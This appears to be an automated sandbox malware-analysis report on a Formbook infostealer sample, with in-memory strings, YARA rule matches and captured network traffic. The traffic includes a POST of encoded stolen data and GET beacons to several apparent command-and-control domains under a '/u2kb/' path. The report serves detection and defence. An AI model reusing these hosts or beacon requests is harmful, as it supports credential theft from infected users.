          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.578840779.000000000DA97000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/
          Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm
          Source: explorer.exe, 00000004.00000003.559686788.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581679941.000000000F0AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.555754627.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533458319.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.562408741.000000000F0AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
          Source: HI4NJ046K.6.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://alldomains.hosting/
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://alldomains.hosting/domain-registrieren.html
          Source: explorer.exe, 00000004.00000002.583702124.0000000015B6E000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.00000000055BE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
          Source: HI4NJ046K.6.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: HI4NJ046K.6.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: HI4NJ046K.6.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmstp.exe, 00000006.00000003.402261377.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.6.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.583702124.00000000159DC000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.569660808.000000000542C000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
          Source: cmstp.exe, 00000006.00000002.570208700.0000000007150000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknown | HTTP traffic detected: POST /u2kb/ HTTP/1.1
              Host: www.gritslab.com
              Connection: close
              Content-Length: 188
              Cache-Control: no-cache
              Origin: http://www.gritslab.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.gritslab.com/u2kb/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00
              Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
          Source: unknown | DNS traffic detected: queries for: www.white-hat.uk
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.white-hat.uk
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.gritslab.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.bitservicesltd.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.222ambking.org
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.energyservicestation.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.younrock.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.thewildphotographer.co.uk
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.shapshit.xyz
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1
              Host: www.thedivinerudraksha.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: mcwfy.exe, 00000001.00000002.314796170.000000000067A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: u8QPnVhq0N.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
